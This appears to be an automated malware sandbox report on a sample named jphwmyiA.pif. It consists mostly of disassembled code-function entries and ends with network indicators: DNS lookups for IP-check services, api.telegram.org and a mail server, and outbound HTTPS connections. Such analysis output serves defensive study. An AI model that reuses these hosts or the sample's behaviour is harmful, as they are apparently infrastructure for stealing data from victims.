Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A1EF39Eh	12_2_2A1EF0D0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A1E3769h	12_2_2A1E34C0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A1EB3BEh	12_2_2A1EB0F0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A1E0B99h	12_2_2A1E08F0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A1ED3AEh	12_2_2A1ED0E0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A1E3BC1h	12_2_2A1E3918
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A1E5FB9h	12_2_2A1E5D10
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A1EC5FEh	12_2_2A1EC330
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A1EE5EEh	12_2_2A1EE320
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A1E0FF1h	12_2_2A1E0D48
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A1E701Ah	12_2_2A1E6F70
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A1E4019h	12_2_2A1E3D70
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A1ED83Eh	12_2_2A1ED570
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A1E6411h	12_2_2A1E6168
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A1E701Ah	12_2_2A1E6F69
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A1EF82Eh	12_2_2A1EF560
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then mov esp, ebp	12_2_2A1E9B8A
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A1EB84Eh	12_2_2A1EB580
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A1EEA7Eh	12_2_2A1EE7B0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A1EAA9Eh	12_2_2A1EA7D0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A1E4471h	12_2_2A1E41C8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A1ECA8Eh	12_2_2A1EC7C0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A1E18A1h	12_2_2A1E15F8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A1EFCBEh	12_2_2A1EF9F0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A254C77h	12_2_2A254908
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A25E210h	12_2_2A25DF18
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A2552A0h	12_2_2A254FA8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A257418h	12_2_2A257120
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A250BF6h	12_2_2A250928
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A259F20h	12_2_2A259C28
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A25CA28h	12_2_2A25C730
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A253507h	12_2_2A253238
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A255C30h	12_2_2A255938
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A25F530h	12_2_2A25F238
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A2560F8h	12_2_2A255E00
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A25F9F8h	12_2_2A25F700
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A258C00h	12_2_2A258908
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A25B708h	12_2_2A25B410
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A252BE6h	12_2_2A252918
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A259A58h	12_2_2A259760
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A251E36h	12_2_2A251B68
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A25C560h	12_2_2A25C268
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A255768h	12_2_2A255470
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A25F069h	12_2_2A25ED70
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A254746h	12_2_2A254478
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A258270h	12_2_2A257F78
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A25030Eh	12_2_2A250040
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A258738h	12_2_2A258440
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A251516h	12_2_2A251248
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A25B240h	12_2_2A25AF48
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A25DD48h	12_2_2A25DA50
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A253E26h	12_2_2A253B58
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A256F50h	12_2_2A256C58
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A25C098h	12_2_2A25BDA0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A253076h	12_2_2A252DA8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A25EBA0h	12_2_2A25E8A8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A257DA8h	12_2_2A257AB0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A251086h	12_2_2A250DB8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A25A8B0h	12_2_2A25A5B8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A25AD78h	12_2_2A25AA80
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A252756h	12_2_2A252488
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A25D880h	12_2_2A25D588
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A256A88h	12_2_2A256790
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A259590h	12_2_2A259298
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A25E6D8h	12_2_2A25E3E0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A2542B6h	12_2_2A253FE8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A2578E0h	12_2_2A2575E8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A25A3E8h	12_2_2A25A0F0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A2522C6h	12_2_2A251FF8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A25CEF0h	12_2_2A25CBF8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A25D3B8h	12_2_2A25D0C0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A253996h	12_2_2A2536C8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A2565C0h	12_2_2A2562C8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A250777h	12_2_2A2504D0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A2590C8h	12_2_2A258DD0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A2519A6h	12_2_2A2516D8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A25BBD0h	12_2_2A25B8D8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A280CC8h	12_2_2A2809D0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A280338h	12_2_2A280040
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A280800h	12_2_2A280508
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	12_2_2A29FAC9
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	12_2_2A29FAD8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	12_2_2A29FDEE
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	12_2_2A3F31D0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then mov ecx, dword ptr [ebp-38h]	12_2_2A3FEF78
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then mov ecx, dword ptr [ebp-38h]	12_2_2A3FEF70
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	12_2_2A3F31C0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then push 00000000h	12_2_2AD3E28E
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	16_2_1A2EDC80
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then mov ecx, dword ptr [ebp-40h]	16_2_1D29FD28
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1D29F2B5h	16_2_1D29F0C8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1D29FC3Fh	16_2_1D29F0C8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then mov ecx, dword ptr [ebp-40h]	16_2_1D29FD20
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	16_2_1D29EDFB
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	16_2_1D29EC1B
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1D29E0C5h	16_2_1D29DF07
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	16_2_1D29E5E8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1D29E0C5h	16_2_1D29E114
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E4510E9h	16_2_1E450E38
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E45C989h	16_2_1E45C6E0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E45D239h	16_2_1E45CF90
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E45185Dh	16_2_1E451440
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E45F4F9h	16_2_1E45F250
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E45C0D9h	16_2_1E45BE30
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E45C531h	16_2_1E45C288
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E45F951h	16_2_1E45F6A8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E45FDA9h	16_2_1E45FB00
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E45CDE1h	16_2_1E45CB38
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E45D691h	16_2_1E45D3E8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E45185Dh	16_2_1E45178B
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E45DAE9h	16_2_1E45D840
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E45185Dh	16_2_1E45142F
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E45E399h	16_2_1E45E0F0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E45DF41h	16_2_1E45DC98
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E45E7F1h	16_2_1E45E548
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E45BC81h	16_2_1E45B9D8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E45F0A1h	16_2_1E45EDF8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E45B829h	16_2_1E45B580
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E45EC49h	16_2_1E45E9A0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E467DC0h	16_2_1E467AF0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E46C16Eh	16_2_1E46BEA0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E4668FDh	16_2_1E4665C0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E46EF0Eh	16_2_1E46EC40
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E4602E9h	16_2_1E460040
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E461CF9h	16_2_1E461A50
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E46CF1Eh	16_2_1E46CC50
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E46AF2Eh	16_2_1E46AC60
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E465709h	16_2_1E465460
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E463311h	16_2_1E463068
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E464D21h	16_2_1E464A78
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E46DCCEh	16_2_1E46DA00
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E46BCDEh	16_2_1E46BA10
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E4648C9h	16_2_1E464620
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E463769h	16_2_1E4634C0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E46517Bh	16_2_1E464ED0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E46F39Eh	16_2_1E46F0D0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E46D3AEh	16_2_1E46D0E0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E46B3BEh	16_2_1E46B0F0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E460B99h	16_2_1E4608F0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E46E15Eh	16_2_1E46DE90
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E460741h	16_2_1E460498
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E462151h	16_2_1E461EA8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E46A17Eh	16_2_1E469EB0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E465B61h	16_2_1E4658B8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E46A60Eh	16_2_1E46A340
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E460FF1h	16_2_1E460D48
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E46F82Eh	16_2_1E46F560
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E466411h	16_2_1E466168
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E46701Ah	16_2_1E466F69
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E46701Ah	16_2_1E466F70
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E464019h	16_2_1E463D70
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E46D83Eh	16_2_1E46D570
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E465FB9h	16_2_1E465D10
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E463BC1h	16_2_1E463918
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E46E5EEh	16_2_1E46E320
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E46C5FEh	16_2_1E46C330
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E46CA8Eh	16_2_1E46C7C0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E464471h	16_2_1E4641C8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E46AA9Eh	16_2_1E46A7D0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E46FCBEh	16_2_1E46F9F0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E4618A1h	16_2_1E4615F8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E46B84Eh	16_2_1E46B580
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then mov esp, ebp	16_2_1E469B8A
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E461449h	16_2_1E4611A0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E46EA7Eh	16_2_1E46E7B0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E4D4C77h	16_2_1E4D4908
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E4D78E0h	16_2_1E4D75E8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E4D52A0h	16_2_1E4D4FA8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E4D1516h	16_2_1E4D1248
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E4DB240h	16_2_1E4DAF48
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E4D030Eh	16_2_1E4D0040
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E4D8738h	16_2_1E4D8440
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E4D3E26h	16_2_1E4D3B58
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E4D6F50h	16_2_1E4D6C58
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E4DDD48h	16_2_1E4DDA50
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E4D1E36h	16_2_1E4D1B68
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E4DC560h	16_2_1E4DC268
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E4D9A58h	16_2_1E4D9760
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E4D4746h	16_2_1E4D4478
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E4D8270h	16_2_1E4D7F78
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E4D5768h	16_2_1E4D5470
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E4DF069h	16_2_1E4DED70
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E4D8C00h	16_2_1E4D8908
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E4D60F8h	16_2_1E4D5E00
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E4DF9F8h	16_2_1E4DF700
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E4D2BE6h	16_2_1E4D2918
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E4DE210h	16_2_1E4DDF18
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E4DB708h	16_2_1E4DB410
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E4D0BF6h	16_2_1E4D0928
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E4D9F20h	16_2_1E4D9C28
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E4D7418h	16_2_1E4D7120
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E4D3507h	16_2_1E4D3238
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E4D5C30h	16_2_1E4D5938
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E4DF530h	16_2_1E4DF238
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E4DCA28h	16_2_1E4DC730
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E4D3996h	16_2_1E4D36C8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E4D65C0h	16_2_1E4D62C8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E4DD3B8h	16_2_1E4DD0C0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E4D19A6h	16_2_1E4D16D8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E4DBBD0h	16_2_1E4DB8D8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E4D0777h	16_2_1E4D04D0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E4D90C8h	16_2_1E4D8DD0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E4D42B6h	16_2_1E4D3FE8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E4DE6D8h	16_2_1E4DE3E0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E4D22C6h	16_2_1E4D1FF8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E4DCEF0h	16_2_1E4DCBF8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E4DA3E8h	16_2_1E4DA0F0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E4D2756h	16_2_1E4D2488
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E4DD880h	16_2_1E4DD588
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E4DAD78h	16_2_1E4DAA80
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E4D9590h	16_2_1E4D9298
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E4D6A88h	16_2_1E4D6790
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E4D3076h	16_2_1E4D2DA8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E4DEBA0h	16_2_1E4DE8A8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E4DC098h	16_2_1E4DBDA0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E4D1086h	16_2_1E4D0DB8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E4DA8B0h	16_2_1E4DA5B8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E4D7DA8h	16_2_1E4D7AB0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E500CC8h	16_2_1E5009D0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then mov ecx, 000003E8h	16_2_1E50FDF0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E500338h	16_2_1E500040
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 1E500800h	16_2_1E500508
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then mov ecx, 000003E8h	16_2_1E50FDE0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	16_2_1E51FAD8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	16_2_1E51FAC9
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	16_2_1E51FACF
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	16_2_1E6731D0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	16_2_1E673148
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	16_2_1E67311F
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	16_2_1E6731C0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then mov ecx, dword ptr [ebp-38h]	16_2_1E67EF70
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then mov ecx, dword ptr [ebp-38h]	16_2_1E67EF78
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then push 00000000h	16_2_1EFBE28E

Source: global traffic	DNS query: name: amazonenviro.com
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: reallyfreegeoip.org
Source: global traffic	DNS query: name: api.telegram.org
Source: global traffic	DNS query: name: mail.techniqueqatar.com

Source: global traffic	TCP traffic: 192.168.2.5:49795 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49802 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49826 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49843 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49854 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49866 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49871 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49879 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49880 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49887 -> 188.114.97.3:443
